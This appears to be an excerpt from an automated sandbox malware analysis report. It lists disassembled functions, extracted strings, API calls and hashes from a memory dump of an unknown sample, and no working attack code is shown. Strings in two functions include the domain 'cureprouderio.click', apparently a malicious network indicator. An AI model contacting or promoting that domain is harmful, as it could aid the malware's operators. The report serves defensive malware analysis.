Instruction Fuzzy Hash: 4F022F7154C3408BD710DF29C8917ABBBE2EFD2314F08892DE4C95B392E6788945CB9B

Function 0040AB10 Relevance: 7.9, Strings: 6, Instructions: 449COMMON

Download Yara Rule

Strings

c`0x, xrefs: 0040AB45
g|0, xrefs: 0040AE17
g|0, xrefs: 0040AD75
*&&$, xrefs: 0040AB22
(8h-, xrefs: 0040AD27
< C, xrefs: 0040AF05

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: (8h-$*&&$$c`0x$< C$g|0$g|0
API String ID: 0-1580158472
Opcode ID: 70758c7dab9075a883c32c3c6bf0054773a41d03f397c4eb1d54b1ad3808d398
Instruction ID: 8a3c8490c8e4005d36cc0b4825e1f46183111491053937cd682d500a6ed3313e
Opcode Fuzzy Hash: 70758c7dab9075a883c32c3c6bf0054773a41d03f397c4eb1d54b1ad3808d398
Instruction Fuzzy Hash: ABD1487564C3858FC314CF25D8903AFBBE2ABC1314F188A3DE4D59B395D779890A878A

Function 00409720 Relevance: 7.9, Strings: 6, Instructions: 418COMMON

Download Yara Rule

Strings

A934FF48BFBB394A296653E0D0DADA99, xrefs: 004097E2
yD, xrefs: 00409828
--)O, xrefs: 00409970
a, xrefs: 00409793
--)O, xrefs: 004097A0, 00409850, 00409805, 004097DC
Bz, xrefs: 00409A15

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: --)O$--)O$A934FF48BFBB394A296653E0D0DADA99$Bz$a$yD
API String ID: 0-2278372357
Opcode ID: 0254858eb2aaab49951eb12f52d2e7a022bf5927a0b8a6f56baf2cce95a43ca8
Instruction ID: a5c808852cbde006f9a55eb82b051dce94ea8ad01dab6570f5b76c7cc8e9a80e
Opcode Fuzzy Hash: 0254858eb2aaab49951eb12f52d2e7a022bf5927a0b8a6f56baf2cce95a43ca8
Instruction Fuzzy Hash: 65D1047261C7408BD318DF26D85176BBBE2EFC1314F18896EE4D597382DA38C909CB5A

Function 00442335 Relevance: 7.7, Strings: 6, Instructions: 171COMMON

Download Yara Rule

Strings

@, xrefs: 0044224C
?89>, xrefs: 004423FD
LfE, xrefs: 004421C3
?89>, xrefs: 004422CE
LfE, xrefs: 00442335
@, xrefs: 0044238A

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: ?89>$?89>$@$@$LfE$LfE
API String ID: 0-1749701207
Opcode ID: 463d07e676dbf4d6f877c27cbbb70b16ead071a8d5c80e0fd66a92f055c92b40
Instruction ID: 31f090f5dffe71cda2be79d57d9316f3a1806e4dd15011659e86b6ce84ea7b32
Opcode Fuzzy Hash: 463d07e676dbf4d6f877c27cbbb70b16ead071a8d5c80e0fd66a92f055c92b40
Instruction Fuzzy Hash: 21513675D101158BEB24CF65C8513AEB7B2FFA4318F18816ED845BB394DBBC4906C788

Function 004042D0 Relevance: 6.7, Strings: 5, Instructions: 467COMMON

Download Yara Rule

Strings

), xrefs: 0040434D
), xrefs: 00404357
IDAT, xrefs: 0040473B
IHDR, xrefs: 004046CC
IEND, xrefs: 004047AF

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: b42f773944664d1ef25501ff16d77fcc22bad273efebcd73054cc4bef17acb1b
Instruction ID: 97f04fb226ebcaee6c6310a356776d8987ffcdf7193aa6b49b6e00adb14277ca
Opcode Fuzzy Hash: b42f773944664d1ef25501ff16d77fcc22bad273efebcd73054cc4bef17acb1b
Instruction Fuzzy Hash: 6902E2B56083808FD700DF29D89075A7BE1EBD6304F05897EEA849B3D2D379D909CB96

Function 0040B090 Relevance: 6.7, Strings: 5, Instructions: 435COMMON

Download Yara Rule

Strings

qw, xrefs: 0040B15F
20, xrefs: 0040B30B
Ur[p, xrefs: 0040B26B
09, xrefs: 0040B16D
><, xrefs: 0040B315

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 09$Ur[p$qw$20$><
API String ID: 0-1156490904
Opcode ID: f9280b1c84ff0d67ebf3133ffd20a93f9f1b710c38028070c1288b99a3075678
Instruction ID: 94cd0463d010bc49a9f80f3244e7d8d823534222e30ea2213312b0eb863d6ad7
Opcode Fuzzy Hash: f9280b1c84ff0d67ebf3133ffd20a93f9f1b710c38028070c1288b99a3075678
Instruction Fuzzy Hash: 410287B5200B01CFD7258F25D891B97BBF4FB49314F108A2CD5AB8BAA1D775A804CF99

Function 00419FB0 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 928COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0041A4E7
FreeLibrary.KERNEL32(?), ref: 0041A524

Part of subcall function 00441A80: LdrInitializeThunk.NTDLL(00444D60,00000002,00000018,?,?,00000018,?,?,?), ref: 00441AAE

Strings

Wuv7, xrefs: 0041A1F5

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: Wuv7
API String ID: 764372645-3833346499
Opcode ID: 48f5965ea3db12b0d62ef401e018f3a03c714632a8a6d9584854be936d7c6506
Instruction ID: 08186e08aac95fe9bbc3aa9b5f550990e5b08f3fc62953fb49b5c8efd66b4738
Opcode Fuzzy Hash: 48f5965ea3db12b0d62ef401e018f3a03c714632a8a6d9584854be936d7c6506
Instruction Fuzzy Hash: 4E62397060A3409BE324CF25CC40BABB7A2BFD5314F148A2EF595573A1D7789C968B4B

Function 0041FD60 Relevance: 5.7, Strings: 4, Instructions: 664COMMON

Download Yara Rule

Strings

FB, xrefs: 00420430
B, xrefs: 0042047A
vB, xrefs: 00420656
bB, xrefs: 00420640

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: B$FB$bB$vB
API String ID: 0-593758424
Opcode ID: 6d63b65a8ad0a761808722d707a7479d892173a636bb9589ff993faa1c389488
Instruction ID: 14f6003d09014d5a946c66e6a3bdba81f883ead7adecb21bbcb7f1d12da82ca5
Opcode Fuzzy Hash: 6d63b65a8ad0a761808722d707a7479d892173a636bb9589ff993faa1c389488
Instruction Fuzzy Hash: 47625CB0608B809EE365CF3C8855797BFE5AB5A314F088A5DE0EE873D2C7756005CB66

Function 004162A3 Relevance: 5.4, Strings: 4, Instructions: 399COMMON

Download Yara Rule

Strings

t-pR, xrefs: 0041644A
z-pR, xrefs: 00416471
drVW, xrefs: 0041626F
drVW, xrefs: 0041651F, 0041653D

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: drVW$drVW$t-pR$z-pR
API String ID: 0-232264995
Opcode ID: 567cb21406912872b92c43fbc8054d7fc376d2023beba164819edf8975115939
Instruction ID: 507f0dcbda89de25532cdbe33131690d3f4f8d19f94ebb7e5d56ae16d6cc5c79
Opcode Fuzzy Hash: 567cb21406912872b92c43fbc8054d7fc376d2023beba164819edf8975115939
Instruction Fuzzy Hash: 5FD111702083809FD728CF28C5547ABBBE1AF96314F54896EE0DA87292DB38D455CB5B

Function 0042A8E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A996

Strings

g[TU, xrefs: 0042A90A
6G0A, xrefs: 0042A8F2

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: 6G0A$g[TU
API String ID: 237503144-3281166493
Opcode ID: bffa2019cc51f3d0548357730ba4c3e91d1c116aaa7a11ea7c2369b1ad6e2ed5
Instruction ID: 6caa8c97efa86b14e0323b0af287bf59f0f21c0348aa58813930e645fb7d1965
Opcode Fuzzy Hash: bffa2019cc51f3d0548357730ba4c3e91d1c116aaa7a11ea7c2369b1ad6e2ed5
Instruction Fuzzy Hash: 6821357925C3645BD314DF609894B6FFAE2EBC6304F05C83CE8D68B281C7B095088796

Function 0042FEC3 Relevance: 5.3, Strings: 4, Instructions: 330COMMON

Download Yara Rule

Strings

<BPr, xrefs: 0043122C
bn\a, xrefs: 004311EF
DBP}, xrefs: 00431336
0, xrefs: 004312D2

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 0$<BPr$DBP}$bn\a
API String ID: 0-676906341
Opcode ID: b8c0a8f20960c2ec52807f2ab0e51e9472114852461e85f2d36250be4d10a4ef
Instruction ID: 1a9b883d357b10d476c9e641e52a61255e16331910abd22464394d77a9b0b4e3
Opcode Fuzzy Hash: b8c0a8f20960c2ec52807f2ab0e51e9472114852461e85f2d36250be4d10a4ef
Instruction Fuzzy Hash: DBA1277121C3818BD318CF69C8A136BFBD1AFAA304F18996EE4D5D7392D67D88058B06

Function 0040DE7D Relevance: 5.3, Strings: 4, Instructions: 306COMMON

Download Yara Rule

Strings

}r, xrefs: 0040E209
yD, xrefs: 0040DF3A
cureprouderio.click, xrefs: 0040E2B1
PKDE, xrefs: 0040E1B9

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: PKDE$cureprouderio.click$}r$yD
API String ID: 0-3784384184
Opcode ID: 6054288f056f029a805a815198842a2530703f98276c0c21c85ccb81a33ebeb2
Instruction ID: 798ab4a65f69fcc7c45512837b56da7e3d3d344687280c99b4832614fb0b749a
Opcode Fuzzy Hash: 6054288f056f029a805a815198842a2530703f98276c0c21c85ccb81a33ebeb2
Instruction Fuzzy Hash: 2DA1D0766583D18FD330CF69D4947EBBBE1AFD6304F18886DC4D8AB381C27949098B96

Function 0040E2EA Relevance: 5.3, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

}r, xrefs: 0040E669
yD, xrefs: 0040E39A
PKDE, xrefs: 0040E619
cureprouderio.click, xrefs: 0040E713

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: PKDE$cureprouderio.click$}r$yD
API String ID: 0-3784384184
Opcode ID: 60d4fc966ab8bcdd0a96d8acba4a5becd9e27d4632de0026382c11138267280a
Instruction ID: 30c7317cfe631e3481c41dac6515f764d62c564387d42c4b6564cec3d3547d28
Opcode Fuzzy Hash: 60d4fc966ab8bcdd0a96d8acba4a5becd9e27d4632de0026382c11138267280a
Instruction Fuzzy Hash: D1A1CF7565C3D18ED330CF69D4947EBBBF1EFA6304F08886ED4D8AB281C27945098B96

Function 0042E8F0 Relevance: 5.3, Strings: 4, Instructions: 278COMMON

Download Yara Rule

Strings

>>,, xrefs: 0042E98D
yD, xrefs: 0042EA57
'18, xrefs: 0042EAEF
!, xrefs: 0042EAAD

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: >>,$!$'18$yD
API String ID: 0-2776474437
Opcode ID: bf8be3bb1d8cf151e4f23bbe7b5b467f36e8b8a727916eaef9e4f28821b03ae5
Instruction ID: c652d90ff5f79a452bbcacf76caa8ec9e0420f8567391d0974084ca9299d6b41
Opcode Fuzzy Hash: bf8be3bb1d8cf151e4f23bbe7b5b467f36e8b8a727916eaef9e4f28821b03ae5
Instruction Fuzzy Hash: B791EC7560D3D18FD334CF2A94987ABBBE2AF92300F18496DD0C98B392DB754806CB56

Function 00416FCC Relevance: 5.3, Strings: 4, Instructions: 264COMMON

Download Yara Rule

Strings

7, xrefs: 004174DA
gfff, xrefs: 00417542
bpA, xrefs: 0041705C
JK, xrefs: 00417461

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 7$JK$bpA$gfff
API String ID: 0-282555493
Opcode ID: 1e8ba523884bac26fae56121e6109f62ea6ff04db5904e675fa66ddd779e7adf
Instruction ID: 96ba3c22ab1ca6e998cbe8dae12b562f7f68e36f45087f33eb2494c7db018f63
Opcode Fuzzy Hash: 1e8ba523884bac26fae56121e6109f62ea6ff04db5904e675fa66ddd779e7adf
Instruction Fuzzy Hash: B48147715187418FD314CF29C8907ABB7E6EBD1324F49893EE9918B391EB788846C786

Function 0043E2B9 Relevance: 4.5, Strings: 3, Instructions: 783COMMON

Download Yara Rule

Strings

;8, xrefs: 0043E98A
=SM, xrefs: 0043E992
ESM, xrefs: 0043E9F8

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: ;8$=SM$ESM
API String ID: 0-2071550078
Opcode ID: 470dfb45c46b40963ec771ccda32fd931d72c58f3de2bfbea3e6fd19054aa445
Instruction ID: 201bdafb4cb281255eac95e1ad14bd55dbe37fcd8bc23dcbf20cd6d7b7b08d38
Opcode Fuzzy Hash: 470dfb45c46b40963ec771ccda32fd931d72c58f3de2bfbea3e6fd19054aa445
Instruction Fuzzy Hash: BE321136A19351CBC718CF29D8512ABB7E2FFCA314F19C97DD48587290EB788909C746

Function 004407B0 Relevance: 4.3, Strings: 3, Instructions: 593COMMON

Download Yara Rule

Strings

S"(w, xrefs: 00440B4C
S"(w, xrefs: 00440940
f, xrefs: 00440AAD

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: S"(w$S"(w$f
API String ID: 2994545307-891790955
Opcode ID: 14076761c347d22d2db1683d283da98ec67ef513cea322a1b4f09e206ffe65e1
Instruction ID: b6aba73085aae373882a5faf16d3d9048db7a96bba14ae20c1f8ceb11bb0f58d
Opcode Fuzzy Hash: 14076761c347d22d2db1683d283da98ec67ef513cea322a1b4f09e206ffe65e1
Instruction Fuzzy Hash: 941215716093518FE324CF15C88072BB7E1BFC5314F158A2EFAA55B3A2C7749C168B86

Function 00430E1E Relevance: 4.1, Strings: 3, Instructions: 307COMMON

Download Yara Rule

Strings

<BPr, xrefs: 0043122C
bn\a, xrefs: 004311EF
DBP}, xrefs: 00431336

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: <BPr$DBP}$bn\a
API String ID: 0-3875138025
Opcode ID: 7bbe10198cab18c67ab8f8a08406ef923a80974c7652c4b297d1aea35f422e10
Instruction ID: adb973997dd7b65f2d6192bd3518060a2a945a76de4b7abfa1ca7e3f044ea4c3
Opcode Fuzzy Hash: 7bbe10198cab18c67ab8f8a08406ef923a80974c7652c4b297d1aea35f422e10
Instruction Fuzzy Hash: BD9128712183818BD318CF7AD8A136BFBD19FAA304F18996EE4D1D7391D7BD88058B46

Function 00430E0C Relevance: 4.0, Strings: 3, Instructions: 280COMMON

Download Yara Rule

Strings

<BPr, xrefs: 0043122C
bn\a, xrefs: 004311EF
DBP}, xrefs: 00431336

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: <BPr$DBP}$bn\a
API String ID: 0-3875138025
Opcode ID: 287e9b936395b7431c6ab13d22a86efa72ad21702d0bd99f9047692c87c3f1b9
Instruction ID: 42c5602541070eca8c1a71fd68c34d2a4e7ebf7037af872404ced079361da7e5
Opcode Fuzzy Hash: 287e9b936395b7431c6ab13d22a86efa72ad21702d0bd99f9047692c87c3f1b9
Instruction Fuzzy Hash: F1913A716183818BD318CF7AD8A136BFBD19FA6304F08956EE4D1D7392D37D88098B56

Function 00427BA0 Relevance: 4.0, Strings: 3, Instructions: 246COMMON

Download Yara Rule

Strings

U-R/, xrefs: 00427E16
!, xrefs: 00427E1E
u)K+, xrefs: 00427E0E

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: !$U-R/$u)K+
API String ID: 0-2588612962
Opcode ID: e02a0cc176deac0ec0b6c5d27fbeb577dae70b8e46719e9d694adfb6a7216817
Instruction ID: 2f7cadbfcca44f334d6b573b31554db2e99b7e4ae10166d2684533dc5c1db4dc
Opcode Fuzzy Hash: e02a0cc176deac0ec0b6c5d27fbeb577dae70b8e46719e9d694adfb6a7216817
Instruction Fuzzy Hash: 2A71F2B060C3518BD710DF24D85176BBBE2EF91328F048A1DE5C94B391E77A8449CB8A

Function 0044144E Relevance: 3.9, Strings: 3, Instructions: 147COMMON

Download Yara Rule

Strings

Xl[r, xrefs: 004415FD
;"$u, xrefs: 00441675
{x, xrefs: 00441615

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: ;"$u$Xl[r${x
API String ID: 0-227042012
Opcode ID: e51afb80c0f4143b050df35a8c5e66e7e0d87bc0f731a5789993d4173eb7896e
Instruction ID: 5d28fcd590f6286e475804d5371265bdcfb89fc9ee4c5ea4ea58e4e22056d106
Opcode Fuzzy Hash: e51afb80c0f4143b050df35a8c5e66e7e0d87bc0f731a5789993d4173eb7896e
Instruction Fuzzy Hash: ED51C3B44183409AE700EF26EC1275BFBE39BE1306F59D43DE48487367DA7A81458B1E

Function 00428CD0 Relevance: 3.8, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

-IJK, xrefs: 00428CFA
9]?_, xrefs: 00428CE2
-AlC, xrefs: 00428CEA

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: -AlC$-IJK$9]?_
API String ID: 0-1375620440
Opcode ID: 09906b6c89c8500b2d78bc473364c0b4162ba459993a32ba3525382daba987ca
Instruction ID: b4231d89575966a179c04a2d21aac88113ca8c2bceb533eb88836b1a65a4f13d
Opcode Fuzzy Hash: 09906b6c89c8500b2d78bc473364c0b4162ba459993a32ba3525382daba987ca
Instruction Fuzzy Hash: 3121EF7241D3908BE318CF65D45575FFBE6EBD2308F05992DE4D18B285CBB8880ACB96

Function 00434F7E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 231memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00435055

Strings

0, xrefs: 00435398

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: e4b745a175f9df37601a45e2f2f4a4a7d9efa34116a08f51d5a3b266f763b1b1
Instruction ID: fcaa68cd73778be99638107f4ade39fe94b403ba3e066e8e7f9963c5650b7be7
Opcode Fuzzy Hash: e4b745a175f9df37601a45e2f2f4a4a7d9efa34116a08f51d5a3b266f763b1b1
Instruction Fuzzy Hash: 73C15321158FC28BD336C63C8818797BED65B67224F488BADD0FE8B3D2C6696205C756

Function 0041667E Relevance: 3.4, APIs: 2, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 490d2f0108a2bd7ae282c78fd43bd77bd07f791d31d2da458d89db359d10c698
Instruction ID: 2a3f84211f14a069d59cd5ad4b8e062fc4761fd119326f6cc8dd0c9ba32e9f2e
Opcode Fuzzy Hash: 490d2f0108a2bd7ae282c78fd43bd77bd07f791d31d2da458d89db359d10c698
Instruction Fuzzy Hash: BCD113729193618BD324CF28C8907ABB7E0FF85710F0A896EE8C597390E738D845C796

Function 00404DE0 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

8, xrefs: 004056F3
0, xrefs: 004056FB

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 803eefb56f3edcdbf614b98283eed850a1bebcfdafe6c016f599b44690eeb098
Instruction ID: 47de83be8c0fb97fd81dff59092ff6eab30a8b8229dc91e5b701b048c77dbc66
Opcode Fuzzy Hash: 803eefb56f3edcdbf614b98283eed850a1bebcfdafe6c016f599b44690eeb098
Instruction Fuzzy Hash: B4720071508740AFD710CF18C884BABBBE1EB88314F44892EF9999B391D379D958CF96

Function 004433D0 Relevance: 3.1, Strings: 2, Instructions: 618COMMON

Download Yara Rule

Strings

27D, xrefs: 00443722
27D, xrefs: 004436BA

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 27D$27D
API String ID: 0-4287991475
Opcode ID: f1eb36332052222b9fa19b63aa5121b1725604326dc8e4c13e2b8296e4da508a
Instruction ID: 0fe3027ed59c9dbc9beb00f50b4ac6fb49209c3d9424abc81069e6994907a2e7
Opcode Fuzzy Hash: f1eb36332052222b9fa19b63aa5121b1725604326dc8e4c13e2b8296e4da508a
Instruction Fuzzy Hash: 15122136708310CFD708CF69E88025AB3E2FB8A315F0A89BDE98587351D775E945CB85

Function 004434C0 Relevance: 3.0, Strings: 2, Instructions: 546COMMON

Download Yara Rule

Strings

27D, xrefs: 00443722
27D, xrefs: 004436BA

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 27D$27D
API String ID: 0-4287991475
Opcode ID: 13b5ceb8f965194732153ed36efcbd78bdd04e57041c2b7d54007db42b02e653
Instruction ID: 849c14dde9f6546233dd6802abac01aa620b379717d40a5aeaa18856df4eb694
Opcode Fuzzy Hash: 13b5ceb8f965194732153ed36efcbd78bdd04e57041c2b7d54007db42b02e653
Instruction Fuzzy Hash: AA02FF36708310CFD708CF69E89066AB7E2FB8A315F0A89BDE98587391D775D805CB85

Function 004222F0 Relevance: 3.0, Strings: 2, Instructions: 483COMMON

Download Yara Rule

Strings

1](+, xrefs: 004224DA
,-./1](+, xrefs: 004224DE

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: ,-./1](+$1](+
API String ID: 0-1167187607
Opcode ID: fbd9dd43749b919fe6856d0c5e934ac2b3904574cec03b14e274aea46f722255
Instruction ID: d0d26203e6ee54847a1fb09d843868d866fc51de429297de24d9d7dd127cb261
Opcode Fuzzy Hash: fbd9dd43749b919fe6856d0c5e934ac2b3904574cec03b14e274aea46f722255
Instruction Fuzzy Hash: 31E100B56083109BD314DF68D881B6BBBE1FFC1318F18892DE9858B391E7B9D805CB56

Function 00443620 Relevance: 2.9, Strings: 2, Instructions: 445COMMON

Download Yara Rule

Strings

27D, xrefs: 00443722
27D, xrefs: 004436BA

Memory Dump Source

